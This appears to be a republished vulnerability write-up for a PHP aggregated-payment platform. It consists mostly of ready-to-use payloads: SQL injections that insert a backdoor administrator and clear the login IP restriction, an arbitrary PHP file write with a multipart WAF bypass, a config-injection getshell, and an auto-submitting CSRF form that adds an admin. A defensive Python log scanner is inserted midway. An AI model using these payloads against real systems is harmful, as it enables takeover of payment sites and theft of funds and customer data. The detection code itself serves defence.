Multiple vulnerabilities in 聚合支付Payment – sinfvnction - 漏洞文库小世界 - 安全文库 - NGC660安全实验室

Multiple vulnerabilities in 聚合支付Payment – sinfvnction

SQL injection

1)

x.x.x.x/Pay_UPALIWAP_callbackurl.html?sdcustomno=1
x.x.x.x/index.php?m=Pay&c=UPALIWAP&a=callbackurl&sdcustomno=1'
x.x.x.x/index.php?m=Pay&c=WftAliSm&a=callbackurl&orderid=1'

2) Requires an agent account
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
POST data:

id=123&name=_log;insert into pay_admin(`id`,`username`,`password`,`groupid`) values ('101','admln','7aa5e695be95cdd64a88410a64dfe2c1','1');--+

3) index.php?m=user&c=api&a=ajaxGetIndustry
Same payload as above

4) Pay_Pay_getSignkey?code=123*&merid=222

5) SQL injection to add an administrator

index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('801','admln','7aa5e695be95cdd64a88410a64dfe2c1%27,'1');--+

6) SQL injection to remove the login IP restriction

index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;update pay_websiteconfig set login_ip = '' where id=1

Arbitrary file write

/index.php?m=pay&c=UPALIWAP&a=file_writeTxt&filepath=./coder.php&source=<?php phpinfo();>

This creates c.php in the web root with the content <?php phpinfo();>

Bypassing the WAF on the write by converting the request into a multipart file upload

POST /index.php?m=pay&c=UPALIWAP&a=file_writeTxt HTTP/1.1
Host: example.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: xxxxx
Connection: close
Content-Type: multipart/form-data; boundary=--------685764754
Content-Length: 202
----------685764754
Content-Disposition: form-data; name="filepath"
./coder.php
----------685764754
Content-Disposition: form-data; name="source"
ssb<?php phpinfo
();// phpinfo and its parentheses are split across two lines here
----------685764754--
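As an added, defender-side example that is not part of the original write-up, the following Python flags requests to the handlers listed above that carry the SQL-injection or PHP-write indicators seen in the payloads, and runs it over access-log lines. The handler table, the sample log lines and the two URL styles it parses (`index.php?m=&c=&a=` and `Module_Controller_action.html`) are taken from this page; everything else (function names, the combined log format) is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Handlers and parameters named in the write-up, keyed by lower-cased (m, c, a).
# Constructed from the page; not taken from the product's own code.
WATCHED = {
    ("pay", "upaliwap", "callbackurl"): {"sdcustomno"},
    ("pay", "wftalism", "callbackurl"): {"orderid"},
    ("pay", "alipage", "callbackurl"): {"out_trade_no"},
    ("user", "intopieces", "ajaxgetindustry"): {"id", "name"},
    ("user", "api", "ajaxgetindustry"): {"id", "name"},
    ("pay", "upaliwap", "file_writetxt"): {"filepath", "source"},
}
SQLI = re.compile(r"'|;\s*(insert|update|delete)\b|--\+", re.I)   # indicators seen in the payloads
PHP_TAG = re.compile(r"<\?php", re.I)
ROUTE = re.compile(r"(?:^|/)([A-Za-z0-9]+)_([A-Za-z0-9]+)_(\w+)(?:\.html)?$")  # Pay_UPALIWAP_callbackurl.html
ACCESS = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)')

def route_of(path, query):  # (m, c, a) from either URL style the write-up shows, else None
    if all(k in query for k in ("m", "c", "a")):
        return tuple(query[k][0].lower() for k in ("m", "c", "a"))
    m = ROUTE.search(path)
    return tuple(s.lower() for s in m.groups()) if m else None

def inspect_request(url, form=None):  # -> [(kind, "m/c/a", param), ...]; [] when clean
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes the values
    route, findings = route_of(parts.path, query), []
    for raw_name, values in list(query.items()) + list((form or {}).items()):
        name = raw_name.split("[", 1)[0].lower()   # out_trade_no[1] -> out_trade_no
        if name not in WATCHED.get(route, ()):
            continue
        for value in values:
            if SQLI.search(value):
                findings.append(("sqli", "/".join(route), raw_name))
            if PHP_TAG.search(value) or (name == "filepath" and value.lower().endswith(".php")):
                findings.append(("file_write", "/".join(route), raw_name))
    return findings

def scan_access_log(lines):  # -> [(client_ip, kind, route, param), ...] over combined-format lines
    return [(m["ip"], *f) for m in filter(None, map(ACCESS.match, lines))
            for f in inspect_request(m["url"])]

# Constructed sample: two of the write-up's requests plus one benign callback.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jul/2019:23:06:46 +0800] "GET /index.php?m=Pay&c=UPALIWAP&a=callbackurl&sdcustomno=1%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Jul/2019:23:07:01 +0800] "GET /index.php?m=pay&c=UPALIWAP&a=file_writeTxt&filepath=./coder.php&source=%3C%3Fphp+phpinfo()%3B HTTP/1.1" 200 12',
    '198.51.100.2 - - [22/Jul/2019:23:07:05 +0800] "GET /index.php?m=Pay&c=UPALIWAP&a=callbackurl&sdcustomno=20190722001 HTTP/1.1" 200 512',
]
```

POST bodies (the ajaxGetIndustry case) are passed in as the `form` dict after the caller has parsed them; multipart bodies need to be decoded into that dict first.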

Backend getshell

manage_System_base.html

Insert

manage_System_base.html',@copy($_REQUEST[x],$_REQUEST[c]),//

CSRF

<html lang="en">
<head>
    <meta charset="UTF-8">
</head>
<body onload="document.forms[0].submit();">
<!-- auto-submitting form: the addAdmin handler accepts the request without an anti-CSRF token -->
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">
<input type="hidden" name="username" value="sinfvnction">
<input type="hidden" name="password" value="hacksb">
<input type="hidden" name="reppassword" value="hacksb">
<input type="hidden" name="groupid" value="1">
</form>
</body>
</html>